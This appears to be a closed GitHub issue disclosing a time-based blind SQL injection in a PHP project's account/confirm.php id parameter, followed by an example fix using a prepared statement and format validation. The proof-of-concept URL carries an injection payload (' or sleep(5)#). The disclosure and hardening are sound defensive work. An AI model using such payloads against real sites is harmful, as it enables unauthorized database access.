Closed wanan0red closed 1 year ago
poc
http://stu/account/confirm.php?id=12345678901234567890123456789012'+or+sleep(5)%23
final sql statement
Repair plan
framework/Accounts.php#userIdFromConfirmcode()
Thank you very much for reporting the issue and providing a fix. Confirmed and fixed with 69736d3d55c9171dca21412480aa2e4f11b4bf62
SQL injection account/confirm.php id parameter exists time blind injection
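One way to harden a confirmation-code lookup like the one named in the repair plan, as an added example; it is not the project's code and not the contents of the fixing commit. The function names, the `confirm_codes` table and its columns, and the 32-character code format are assumptions, and SQLite stands in for the real database so the script runs offline.

```php
<?php
declare(strict_types=1);

// Bound lookup: the code travels as a parameter, never as part of the SQL text.
// Table and column names are hypothetical.
function lookupConfirmCode(PDO $db, string $code): ?int
{
    $stmt = $db->prepare('SELECT user_id FROM confirm_codes WHERE code = :code');
    $stmt->execute([':code' => $code]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : (int) $row['user_id'];
}

// Allow-list the format first, then do the bound lookup.
// Assumption: confirmation codes are exactly 32 characters of [0-9A-Za-z].
function userIdFromConfirmCodeSafe(PDO $db, string $code): ?int
{
    if (preg_match('/\A[0-9A-Za-z]{32}\z/', $code) !== 1) {
        return null;
    }
    return lookupConfirmCode($db, $code);
}

// Constructed data in an in-memory SQLite database (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE confirm_codes (code TEXT PRIMARY KEY, user_id INTEGER NOT NULL)');
$valid = '12345678901234567890123456789012';
$db->prepare('INSERT INTO confirm_codes (code, user_id) VALUES (?, ?)')->execute([$valid, 7]);

// The id value from the report's URL as PHP would decode it: "+" -> space, "%23" -> "#".
$reported = urldecode("12345678901234567890123456789012'+or+sleep(5)%23");

$checks = [
    'valid code resolves to its user'       => userIdFromConfirmCodeSafe($db, $valid) === 7,
    'reported value fails the format check' => userIdFromConfirmCodeSafe($db, $reported) === null,
    'reported value is inert when bound'    => lookupConfirmCode($db, $reported) === null,
];
foreach ($checks as $name => $ok) {
    echo ($ok ? 'PASS' : 'FAIL') . "  $name\n";
}
```

The third check shows that parameter binding alone neutralises the reported value; the format check is an extra layer that rejects malformed codes before any query runs.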